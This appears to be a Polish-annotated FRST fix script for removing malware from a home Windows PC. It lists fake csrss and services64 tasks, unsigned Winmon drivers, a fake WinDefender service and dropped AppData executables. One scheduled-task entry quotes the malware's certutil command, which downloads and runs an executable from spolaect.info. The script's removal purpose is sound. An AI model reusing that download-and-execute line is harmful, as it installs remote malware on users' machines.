CreateRestorePoint:
CloseProcesses:
EmptyTemp:
HKLM-x32\...\Run: [] => [X]
Task: {0CEDFE21-885B-42B7-9F3E-FA3297423775} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4651048 2021-09-04] (10124 -> ) [Brak podpisu cyfrowego] <==== UWAGA
Task: {5138E38C-B8B2-4E6B-BCD5-7E2CE7A18366} - System32\Tasks\services64 => C:\Users\Artur\AppData\Roaming\services64.exe [44032 2021-09-04] (Google5 Inc.) [Brak podpisu cyfrowego] <==== UWAGA
Task: {5A95EFA7-79CA-481D-9BFE-B6B8D9F2DF8B} - System32\Tasks\{AC6143B3-CF11-40A5-A1A4-A35F16A880C3} => C:\Windows\system32\pcalua.exe -a D:\Driver_D_CAN_USB\OBDSetup.exe -d D:\Driver_D_CAN_USB
Task: {6BE150D4-EAC7-4C0A-B27E-8A657D9E6142} - System32\Tasks\{85965F93-FBF2-4732-8E6F-3006B8F9C36A} => C:\Windows\system32\pcalua.exe -a C:\Users\Artur\Downloads\InterfejsB_BMW_USB\Driver_D_CAN_USB\OBDSetup.exe -d C:\Users\Artur\Downloads\InterfejsB_BMW_USB\Driver_D_CAN_USB
Task: {81D154D5-D5F8-4A76-BF12-28E79D5A9C1A} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Artur\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Artur\AppData\Local\Temp\csrss\scheduled.exe /31340 -> /C certutil.exe -urlcache -split -f hxxps://spolaect.info/app/app.exe C:\Users\Artur\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Artur\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA
Tcpip\..\Interfaces\{B740712C-7AF1-4D14-B39C-3ABA122B83AC}: [DhcpNameServer] 192.168.0.1
FF Plugin: @microsoft.com/GENUINE -> disabled [Brak pliku]
FF Plugin-x32: @google.com/zxwebplugin -> C:\Windows\system32\npzxwebplugin.dll [Brak pliku]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Brak pliku]
S2 AppServiceb; C:\Windows\system32\LWPPKOYKN1.tmp [6144 2021-09-04] (Microsoft Corporation) [Brak podpisu cyfrowego] <==== UWAGA
R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] (Odmowa dostępu) <==== UWAGA (Odmowa dostępu) <==== UWAGA
S2 CDIF3Service; D:\CDIF3\bin\c3svc.exe [X]
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 0000-00-00] () <==== UWAGA (zerobajtowy plik/folder)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows (R) Win 7 DDK provider) <==== UWAGA (zerobajtowy plik/folder)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2021-09-04] (WDKTestCert Admin,131666266076831434 -> ) [Brak podpisu cyfrowego] <==== UWAGA
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
2021-09-04 10:04 - 2021-09-04 10:04 - 000166400 _____ (sdvsdsdvds) C:\Users\Artur\AppData\Roaming\1211288.exe
2021-09-04 10:04 - 2021-09-04 10:04 - 000166912 _____ (sdvsdsdvds) C:\Users\Artur\AppData\Roaming\2266923.exe
2021-09-04 10:04 - 2021-09-04 10:04 - 000086016 _____ (Hoting) C:\Users\Artur\AppData\Roaming\4839901.exe
2021-09-04 10:04 - 2021-09-04 10:04 - 000086016 _____ (Hoting) C:\Users\Artur\AppData\Roaming\5476827.exe
2021-09-04 10:05 - 2021-09-04 10:05 - 003223840 _____ (Realtek Semiconductor Corp.) C:\Users\Artur\AppData\Roaming\5495358.exe
2021-09-04 10:05 - 2021-09-04 10:05 - 000226816 _____ () C:\Users\Artur\AppData\Roaming\7717230.exe
2021-09-04 10:05 - 2021-09-04 10:05 - 000282112 _____ (hdgrfdgregre) C:\Users\Artur\AppData\Roaming\7776951.exe
2021-09-04 10:04 - 2021-09-04 10:04 - 000226816 _____ () C:\Users\Artur\AppData\Roaming\7830778.exe
2021-09-04 10:05 - 2021-09-04 10:05 - 000320000 _____ () C:\Users\Artur\AppData\Roaming\8071467.exe
2021-09-04 10:05 - 2021-09-04 10:05 - 000282112 _____ (hdgrfdgregre) C:\Users\Artur\AppData\Roaming\8618314.exe
2021-09-04 10:05 - 2021-09-04 10:55 - 000044032 _____ (Google5 Inc.) C:\Users\Artur\AppData\Roaming\services64.exe
MSCONFIG\startupreg: AgedViolet => "C:\Windows\rss\csrss.exe"
MSCONFIG\startupreg: WinHost => C:\Users\Artur\AppData\Roaming\WinHost\WinHoster.exe
FirewallRules: [{AEF00335-43FC-47FA-B740-E82BB8956699}] => (Allow) D:\CDIF3\bin\c3svc.exe => Brak pliku
FirewallRules: [{6C4EF42A-1A11-4276-A9E2-9335B5437D5E}] => (Allow) D:\CDIF3\bin\c3svc.exe => Brak pliku
FirewallRules: [{77D469D6-C6CC-4EB8-82FF-60F6260925A4}] => (Allow) D:\CDIF3\bin\c3.exe => Brak pliku
FirewallRules: [{01731096-7BFD-4AFC-ADB9-6FEABF138D01}] => (Allow) D:\CDIF3\bin\c3.exe => Brak pliku
FirewallRules: [{D2EDA4FF-B66A-4F2F-B6C1-537D164ECED2}] => (Allow) D:\CDIF3\bin\c3update.exe => Brak pliku
FirewallRules: [{3AB3D65B-2554-4D8D-A902-2E2E13D114AA}] => (Allow) D:\CDIF3\bin\c3update.exe => Brak pliku
FirewallRules: [{A190DC85-153F-4E86-9BD8-A5C73BAA84AF}] => (Allow) C:\Windows\rss\csrss.exe (10124 -> ) [Brak podpisu cyfrowego]
RemoveProxy:
Hosts: